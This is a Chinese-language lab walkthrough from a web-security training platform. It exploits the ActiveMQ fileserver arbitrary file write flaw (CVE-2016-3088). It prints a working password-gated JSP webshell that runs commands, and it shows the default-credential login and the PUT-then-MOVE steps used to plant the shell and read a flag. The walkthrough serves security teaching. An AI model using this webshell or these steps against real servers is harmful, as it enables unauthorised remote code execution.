墨者学院WEB安全ActiveMQ任意文件写入漏洞分析溯源ActiveMQ 简介漏洞复现参考链接
墨者学院
WEB安全
ActiveMQ任意文件写入漏洞分析溯源
ActiveMQ 简介
ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用
fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:
其使用率并不高
文件操作容易出现漏洞
漏洞复现
-
访问url
-
查找漏洞
搜索发现存在CVE-2016-3088 漏洞,找到分析查看漏洞原因
查询发现在ActiveMQ<5.12.x版本存在fileserver 应用,可以通过fileserver写入文件(不解析jsp文件)通过移动到任意位置,就可以造成任意文件写入漏洞。
文件写入的几种利用方式
1 写入webshell
2 写入 cron 或 ssh key
3 写入 jar 或 jetty.xml 等库和配置文件
写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。
-
漏洞利用
尝试写入jsp
有回显带密码验证的
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %> 请求url:http://ip:port/Shell/cmd2.jsp?pwd=023&i=ls</pre>
通过burp访问,发现需要验证,需要登录,我们尝试登录,默认的ActiveMQ的账号和密码均为admin
登录后查看http方法 ,发现没有put方法
执行put方法 发现却上传成功了
接下来通过move移动到admin或api下,就可以解析jsp文件了, 查找他的绝对路径
> 访问url:[http://ip:port/admin/test/systemProperties.jsp](http://ip:port/admin/test/systemProperties.jsp)
>
> [图片上传失败...(image-99ffb1-1567592524169)]
通过move方法将jsp木马移动到admin或api下,进行解析
然后访问,可以执行命令,
这里就可以直接查看flag,最后在根目录找到了flag